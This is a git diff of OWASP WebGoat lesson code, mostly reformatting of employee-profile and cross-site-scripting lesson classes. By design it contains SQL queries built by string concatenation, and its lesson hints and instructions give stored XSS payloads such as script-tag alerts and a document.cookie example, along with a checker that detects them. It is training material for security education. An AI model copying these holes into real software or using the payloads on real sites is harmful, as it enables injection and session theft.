+	public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
+			throws UnauthorizedException
 	{
-	    // FIXME: Cannot choose the id because we cannot guarantee uniqueness
-		int nextId = getNextUID(s);
-	    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+					+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+					+ " personal_description = ? WHERE userid = ?;";
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
+																					ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
 
-	    //System.out.println("Query:  " + query);
+				ps.setString(1, employee.getFirstName());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getPersonalDescription());
+				ps.setInt(13, subjectId);
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
 
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-			ps.setString(1, employee.getFirstName().toLowerCase());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getDisciplinaryActionDate());
-			ps.setString(13, employee.getDisciplinaryActionNotes());
-			ps.setString(14, employee.getPersonalDescription());
-
-			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
+
+	public void doChangeEmployeeProfile_BACKUP(WebSession s, int userId, int subjectId, Employee employee)
+			throws UnauthorizedException
 	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+					+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+					+ " personal_description = ? WHERE userid = ?;";
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
+																					ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
+
+				ps.setString(1, employee.getFirstName());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getPersonalDescription());
+				ps.setInt(13, subjectId);
+				ps.executeUpdate(query);
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-    }
 
-
-    public void createEmployeeProfile_BACKUP(WebSession s, int userId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
+	public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
 	{
-	    // FIXME: Cannot choose the id because we cannot guarantee uniqueness
-			int nextId = getNextUID(s);
-		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+		try
+		{
+			// FIXME: Cannot choose the id because we cannot guarantee uniqueness
+			int nextId = getNextUID(s);
+			String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
 
-	    //System.out.println("Query:  " + query);
+			// System.out.println("Query: " + query);
 
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-			ps.setString(1, employee.getFirstName().toLowerCase());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getDisciplinaryActionDate());
-			ps.setString(13, employee.getDisciplinaryActionNotes());
-			ps.setString(14, employee.getPersonalDescription());
-
-			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+				ps.setString(1, employee.getFirstName().toLowerCase());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getDisciplinaryActionDate());
+				ps.setString(13, employee.getDisciplinaryActionNotes());
+				ps.setString(14, employee.getPersonalDescription());
+
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
+
+	public void createEmployeeProfile_BACKUP(WebSession s, int userId, Employee employee) throws UnauthorizedException
 	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
+		try
+		{
+			// FIXME: Cannot choose the id because we cannot guarantee uniqueness
+			int nextId = getNextUID(s);
+			String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+			// System.out.println("Query: " + query);
+
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+				ps.setString(1, employee.getFirstName().toLowerCase());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getDisciplinaryActionDate());
+				ps.setString(13, employee.getDisciplinaryActionNotes());
+				ps.setString(14, employee.getPersonalDescription());
+
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-    }
 
+	/**
+	 * Validates that the given parameter value matches the given regular expression pattern.
+	 * 
+	 * @param parameter
+	 * @param pattern
+	 * @return
+	 * @throws ValidationException
+	 */
+	protected String validate(final String parameter, final Pattern pattern) throws ValidationException
+	{
+		Matcher matcher = pattern.matcher(parameter);
+		if (!matcher.matches()) throw new ValidationException();
 
-    /**
-     * Validates that the given parameter value matches the given regular expression pattern.
-     * 
-     * @param parameter
-     * @param pattern
-     * @return
-     * @throws ValidationException
-     */
-    protected String validate(final String parameter, final Pattern pattern)
-	    throws ValidationException
-    {
-	Matcher matcher = pattern.matcher(parameter);
-	if (!matcher.matches())
-	    throw new ValidationException();
+		return parameter;
+	}
 
-	return parameter;
-    }
-
-    private int getNextUID(WebSession s)
-    {
-	int uid = -1;
-	try
-	{
-	    Statement statement = WebSession.getConnection(s).createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement
-		    .executeQuery("select max(userid) as uid from employee");
-	    results.first();
-	    uid = results.getInt("uid");
-	}
-	catch (SQLException sqle)
-	{
-	    sqle.printStackTrace();
-	    s.setMessage("Error updating employee profile");
-	}
-	catch (ClassNotFoundException e)
-	{
-	    // TODO Auto-generated catch block
-	    e.printStackTrace();
-	}
-	return uid + 1;
-    }
+	private int getNextUID(WebSession s)
+	{
+		int uid = -1;
+		try
+		{
+			Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																				ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
+			results.first();
+			uid = results.getInt("uid");
+		} catch (SQLException sqle)
+		{
+			sqle.printStackTrace();
+			s.setMessage("Error updating employee profile");
+		} catch (ClassNotFoundException e)
+		{
+			// TODO Auto-generated catch block
+			e.printStackTrace();
+		}
+		return uid + 1;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java
index c694b93ba..83a70aad2 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.CrossSiteScripting;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.Employee;
@@ -13,240 +13,200 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ViewProfile extends DefaultLessonAction
 {
 
-    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.USER_ID);
-	    int employeeId = -1;
-	    try
-	    {
-		// User selected employee
-		employeeId = s.getParser().getIntParameter(
-			CrossSiteScripting.EMPLOYEE_ID);
-	    }
-	    catch (ParameterNotFoundException e)
-	    {
-		// May be an internally selected employee
-		employeeId = getIntRequestAttribute(s, getLessonName() + "."
-			+ CrossSiteScripting.EMPLOYEE_ID);
-	    }
-
-	    Employee employee = getEmployeeProfile(s, userId, employeeId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
-
-	    updateLessonStatus(s, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-
-    public String getNextPage(WebSession s)
-    {
-	return CrossSiteScripting.VIEWPROFILE_ACTION;
-    }
-
-
-    public Employee getEmployeeProfile(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
 	{
-	    String query = "SELECT * FROM employee WHERE userid = "
-		    + subjectUserId;
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
+			int employeeId = -1;
+			try
+			{
+				// User selected employee
+				employeeId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID);
+			} catch (ParameterNotFoundException e)
+			{
+				// May be an internally selected employee
+				employeeId = getIntRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID);
+			}
+
+			Employee employee = getEmployeeProfile(s, userId, employeeId);
+			setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
+
+			updateLessonStatus(s, employee);
+		}
+		else
+			throw new UnauthenticatedException();
 	}
 
-	return profile;
-    }
-
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	// Query the database to determine if this employee has access to this function
-	// Query the database for the profile data of the given employee if "owned" by the given user
-
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public String getNextPage(WebSession s)
 	{
-	    String query = "SELECT * FROM employee WHERE userid = "
-		    + subjectUserId;
+		return CrossSiteScripting.VIEWPROFILE_ACTION;
+	}
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
-	}
+			String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
 
-	return profile;
-    }
-
-
-    private void updateLessonStatus(WebSession s, Employee employee)
-    {
-	String stage = getStage(s);
-	int userId = -1;
-	try {
-		userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + CrossSiteScripting.USER_ID);
-	} catch (ParameterNotFoundException pnfe) {
-	}
-	if (CrossSiteScripting.STAGE1.equals(stage))
-	{
-		String address1 = employee.getAddress1().toLowerCase();
-		if (userId != employee.getId()
-			&& address1.indexOf("<script>") > -1
-			&& address1.indexOf("alert") > -1
-			&& address1.indexOf("</script>") > -1)
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    setStageComplete(s, CrossSiteScripting.STAGE1);
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
+
+	public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		// Query the database to determine if this employee has access to this function
+		// Query the database for the profile data of the given employee if "owned" by the given
+		// user
+
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
+
+	private void updateLessonStatus(WebSession s, Employee employee)
+	{
+		String stage = getStage(s);
+		int userId = -1;
+		try
+		{
+			userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
+		} catch (ParameterNotFoundException pnfe)
+		{
+		}
+		if (CrossSiteScripting.STAGE1.equals(stage))
+		{
+			String address1 = employee.getAddress1().toLowerCase();
+			if (userId != employee.getId() && address1.indexOf("<script>") > -1 && address1.indexOf("alert") > -1
+					&& address1.indexOf("</script>") > -1)
+			{
+				setStageComplete(s, CrossSiteScripting.STAGE1);
+			}
+		}
+		else if (CrossSiteScripting.STAGE3.equals(stage))
+		{
+			String address2 = employee.getAddress1().toLowerCase();
+			if (address2.indexOf("<script>") > -1 && address2.indexOf("alert") > -1
+					&& address2.indexOf("</script>") > -1)
+			{
+				setStageComplete(s, CrossSiteScripting.STAGE3);
+			}
+		}
+		else if (CrossSiteScripting.STAGE4.equals(stage))
+		{
+			if (employee.getAddress1().toLowerCase().indexOf("&lt;") > -1)
+			{
+				setStageComplete(s, CrossSiteScripting.STAGE4);
+			}
 		}
 	}
-	else if (CrossSiteScripting.STAGE3.equals(stage))
-	{
-		String address2 = employee.getAddress1().toLowerCase();
-		if (address2.indexOf("<script>") > -1
-			&& address2.indexOf("alert") > -1
-			&& address2.indexOf("</script>") > -1)
-		{
-		    setStageComplete(s, CrossSiteScripting.STAGE3);
-		}
-	}
-	else if (CrossSiteScripting.STAGE4.equals(stage))
-	{
-		if (employee.getAddress1().toLowerCase().indexOf("&lt;") > -1)
-		{
-		    setStageComplete(s, CrossSiteScripting.STAGE4);
-		}
-	}
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java
index 5832ccc29..71492bd20 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons.DBCrossSiteScripting;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.ElementContainer;
 import org.owasp.webgoat.lessons.Category;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
@@ -21,240 +21,221 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
+
 /**
- /*******************************************************************************
+ * /*******************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  */
 public class DBCrossSiteScripting extends GoatHillsFinancial
 {
-    private final static Integer DEFAULT_RANKING = new Integer(100);
+	private final static Integer DEFAULT_RANKING = new Integer(100);
 
-    public final static String STAGE1 = "Stored XSS";
-    
-    public final static String STAGE2 = "Block Stored XSS using DB Input Validation";
-    
-    protected void registerActions(String className)
-    {
-	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+	public final static String STAGE1 = "Stored XSS";
 
-	// These actions are special in that they chain to other actions.
-	registerAction(new Login(this, className, LOGIN_ACTION,
-		getAction(LISTSTAFF_ACTION)));
-	registerAction(new Logout(this, className, LOGOUT_ACTION,
-		getAction(LOGIN_ACTION)));
-	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
-		getAction(VIEWPROFILE_ACTION)));
-	registerAction(new UpdateProfile(this, className,
-		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-	registerAction(new DeleteProfile(this, className,
-		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
+	public final static String STAGE2 = "Block Stored XSS using DB Input Validation";
 
-    /**
-     *  Gets the category attribute of the CrossSiteScripting object
-     *
-     * @return    The category value
-     */
-    public Category getDefaultCategory()
-    {
-	return Category.XSS;
-    }
-
-    /**
-     *  Gets the hints attribute of the DirectoryScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-
-	// Stage 1
-	hints.add("You can put HTML tags in form input fields.");
-	hints
-		.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
-	hints
-		.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
-	hints
-		.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
-
-	// Stage 2
-	hints
-		.add("Many scripts rely on the use of special characters such as: &lt;");
-	hints
-		.add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
-	hints
-		.add("Oracle 10 supports a regular expression matching function : REGEXP_LIKE(text, pattern).");
-
-	return hints;
-    }
-
-
-    /**
-     *  Gets the instructions attribute of the ParameterInjection object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "";
-
-	if (!getLessonTracker(s).getCompleted())
+	protected void registerActions(String className)
 	{
-		String stage = getStage(s);
-		if (STAGE1.equals(stage))
-	    {
-		    instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
-			    + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
-			    + "Verify that 'Jerry' is affected by the attack. "
-			    + "A sample JavaScript snippet you can use is: &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.";
-	    }
-		else if (STAGE2.equals(stage))
+		registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+		// These actions are special in that they chain to other actions.
+		registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
+		registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
+		registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+	}
+
+	/**
